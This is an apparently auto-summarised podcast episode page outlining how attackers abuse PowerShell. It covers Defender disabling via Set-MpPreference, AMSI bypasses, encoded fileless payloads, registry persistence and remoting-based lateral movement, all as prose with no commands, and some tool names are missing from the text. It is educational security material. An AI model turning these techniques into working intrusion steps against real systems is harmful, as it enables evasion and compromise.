Subscribe to the CyberThreatPOV Podcast

Episode 50: How Attackers Use PowerShell

by: RichPosted on:

In this episode Spencer and Darrius discuss how cyber adversaries harness the power of PowerShell to orchestrate their malicious activities. Stay tuned for the next episode where we talk about defending and mitigating PowerShell attacks.

The Power of Powershell

  • 00:28 Cyber adversaries leverage the power of Powershell to carry out their malicious activities.
  • 00:51 In the next episode, they will explore how defenders can use Powershell and security tools to detect and mitigate attacks.
  • 01:14 Powershell is a powerful language that is widely used and loved by many in the IT industry.
  • 01:32 Despite some limitations imposed on it, such as script block logging and constrained language mode, Powershell remains relevant in offensive security.

Personal Experiences with Powershell

  • 02:10 The hosts share their personal experiences with using Powershell for automation and administrative tasks.
  • 02:31 They express excitement about discussing both offensive and defensive aspects of using Powershell.

Ubiquity and Native Integration

  • 03:06 Attackers love using Powershell because it is ubiquitous in modern Windows environments.
  • 03:28 Its native integration allows attackers to easily call .NET libraries or use C# within their malicious code.
  • 04:49 For offensive security purposes, loading DLL files or C# programs into memory using add type or system.reflection.assembly is common practice.

Note: Timestamps are provided for each bullet point to help locate specific parts of the video.

06:09 Introduction to PowerShell

In this section, the speaker introduces PowerShell and highlights its usefulness for IT administrators. They mention the “Invoke-Command” cmdlet that allows running commands on other systems. PowerShell is beginner-friendly and follows a verb-noun command structure.

Powershell Features

  • PowerShell provides built-in functionality like “Invoke-Command” and “Invoke-WebRequest” for running commands on remote systems and interacting with web resources.
  • It is beginner-friendly, making it easy to learn and use.
  • PowerShell uses a verb-noun command structure, making it intuitive to understand the purpose of each commandlet.
  • The lack of compilation makes it convenient for rapid prototyping and scripting tasks.
  • PowerShell is commonly used in various attack techniques, such as reconnaissance, lateral movement, privilege escalation, and credential access.

08:16 Common Attacks Using PowerShell

This section discusses common attack scenarios involving PowerShell. The focus is on enumeration, reconnaissance, and leveraging PowerShell’s pipelining ability.

Enumeration and Reconnaissance

  • During penetration tests or attacks, enumeration and reconnaissance are often the initial steps taken.
  • PowerShell excels at these tasks by easily collecting information such as hostname, IP addresses, file shares, registry keys, etc., using scripts or built-in cmdlets.
  • Its pipelining ability allows chaining multiple commands together to filter results or redirect output to files.
  • Attackers leverage these capabilities to find files, enumerate network shares, gather system information quickly.

09:58 Handling Output with PowerShell

This section focuses on how attackers abuse PowerShell’s output handling capabilities. It highlights the ease of filtering large JSON objects returned from APIs using PowerShell.

Output Handling

  • With its object-oriented approach, PowerShell makes it easy to handle and filter large JSON objects returned from APIs.
  • Unlike other tools like the AWS CLI, PowerShell provides a simpler way to drill down into objects and extract specific information.
  • PowerShell offers cmdlets like “ConvertFrom-Json” and “ConvertTo-Csv” for converting data formats, making it convenient for creating or manipulating output.
  • PowerShell’s ability to consume APIs and handle output efficiently is advantageous for attackers during reconnaissance, discovery, and enumeration.

11:26 Abusing PowerShell for Defense Evasion

This section discusses how attackers abuse PowerShell to evade defense mechanisms. It highlights disabling Windows Defender as an example.

Defense Evasion

  • Attackers commonly abuse PowerShell to disable Windows Defender using cmdlets like “Set-MpPreference.”
  • Various commandlets in PowerShell allow administrators to manage Windows Defender settings, including disabling real-time monitoring or deleting signatures.
  • Attackers can continuously reset or delete Defender signatures using simple scripts, evading detection by security solutions.

Note: The transcript provided does not cover the entire video.

12:32 PowerShell Defender Commandlets

This section discusses the availability and usage of PowerShell’s Defender commandlets, which can be used to bypass security measures.

PowerShell’s Ubiquity and Availability

  • PowerShell’s Defender commandlets are available regardless of whether Defender is running or not.
  • These commandlets can be used by users, but some may require administrative access to execute.

Bypassing AMSI with PowerShell

  • AMSI (Antimalware Scan Interface) bypasses are commonly used in offensive security and malware development.
  • Many AMSI bypasses are created in PowerShell or ported to it from other languages.
  • New bypass methods for AMSI are frequently discovered, making it a cat-and-mouse game between attackers and defenders.

Importance of PowerShell Logging

  • Enabling and monitoring PowerShell logging is crucial for detecting malicious activities.
  • Attackers often disable PowerShell logging or clear event logs to cover their tracks.
  • Clearing event logs should trigger alerts as it indicates suspicious activity.

15:13 Execution Techniques in PowerShell

This section focuses on various execution techniques used by attackers in PowerShell.

Downloading Additional Tools

  • Attackers use PowerShell to download additional tools onto the compromised host or load them into memory.
  • Commonly downloaded tools include PowerView for reconnaissance purposes.

Fileless Malware Attacks

  • Encoded PowerShell commands are frequently used in different stages of an infection chain.
  • Loading binaries into memory instead of writing them to disk helps evade detection by traditional antivirus solutions.

Role of PowerShell in Fileless Malware Attacks

  • Fileless malware attacks leverage the capabilities of scripting languages like VBA, JScript, and macros within Office documents.
  • Amsi helps detect fileless attacks but has limitations that attackers exploit.

Infection Chain Examples

  • Phishing emails often contain malicious Word documents that download additional files or execute encoded PowerShell commands.
  • Base64 encoding is commonly used to obfuscate PowerShell commands in an infection chain.

Note: The transcript has been summarized and organized into two main sections: “PowerShell Defender Commandlets” and “Execution Techniques in PowerShell.” Each section includes relevant bullet points with timestamps for easy reference.

19:00 Persistence Techniques in PowerShell

In this section, the speaker discusses various persistence techniques using PowerShell.

Modifying Registry Keys for Persistence

  • Threat actors often modify registry keys to achieve persistence.
  • By adding byte code or a key in the registry, they can execute commands in memory.

Using PowerShell Scripts for Persistence

  • The speaker mentions using PowerShell scripts to find privilege escalation opportunities within scheduled tasks.
  • Scheduled tasks are susceptible to unquoted paths, similar to services.
  • PowerShell scripts can be used to enumerate hosts and identify vulnerable scheduled tasks or services that can be abused.

Modifying the Registry and Creating Accounts

  • Modifying the registry is another example of achieving persistence using PowerShell.
  • Built-in PowerShell commandlets can be used to create new accounts and add members to local admin groups.

Ubiquity of PowerShell

  • The ubiquity of PowerShell makes it a popular choice for attackers.
  • It allows them to perform various actions and blend in with legitimate activity on Windows systems.

22:11 Lateral Movement with PowerShell Remoting

This section focuses on lateral movement techniques using PowerShell remoting.

Powershell Remoting as a Lateral Movement Technique

  • Powershell remoting, including utilities like and , is commonly used for lateral movement by attackers.
  • It provides an alternative to traditional methods like PSExec or custom services.

Blending In with Built-in Windows Tools

  • Attackers can leverage built-in Windows tools like Powershell to blend in with legitimate activity on compromised hosts.
  • This makes detection more challenging for defenders who may not easily differentiate between malicious and normal usage of Powershell.

23:22 Chaining Techniques for Lateral Movement

The speaker discusses an interesting engagement where chaining different techniques was attempted for lateral movement.

Chaining XP Command Shell and PowerShell

  • In a specific engagement, the team attempted to chain XP command shell with PowerShell for lateral movement.
  • They started by gaining access to SQL Server and enabling XP command shell.
  • Then, they used PowerShell remoting () to connect to another system where they had admin rights.

Blending In with Built-in Windows Tools

  • The use of built-in Windows tools like Powershell helps attackers blend in and evade detection.
  • By avoiding custom services or tools like Cobalt Strike Beacon, attackers can leverage the ubiquity of Powershell for their operations.

Note: The transcript provided does not cover the entire video.

25:33

In this section, the speaker discusses the importance of understanding Powershell and its applications in IT and cybersecurity. They emphasize the benefits of learning Powershell for automation, offensive security, defensive security, and tool development.

Powershell as a Remoting Session

  • The speaker mentions that quoting, escaping, and other details need to be handled correctly when using Powershell remoting sessions.
  • This session highlights how Powershell can be used for various tasks.

Potato Exploit and C#

  • The potato exploit is mentioned as an example of an exploit written in C#, which is closely related to Powershell.
  • The speaker notes that Powershell and C# are tightly coupled together.

Importance of Learning Powershell

  • Learning Powershell is highly recommended for individuals in the IT or cybersecurity space.
  • Benefits include automating tasks without others knowing, offensive security practices, defensive security measures, and overall professional growth.

Offensive Use of Powershell

  • There is potential for another episode discussing how offensive security professionals use Powershell for automating tasks or developing their own tools.
  • This aspect was not covered extensively in this episode focused on attackers abusing Powershell.

Defensive Use of Powershell

  • Similarly, there is potential to explore how administrators use Powershell for enumeration scripts, full-fledged tool development, automation, and other defensive purposes.

Blog: https://offsec.blog/
Youtube: https://www.youtube.com/@cyberthreatpov
Twitter: https://twitter.com/cyberthreatpov
Work with Us: https://securit360.com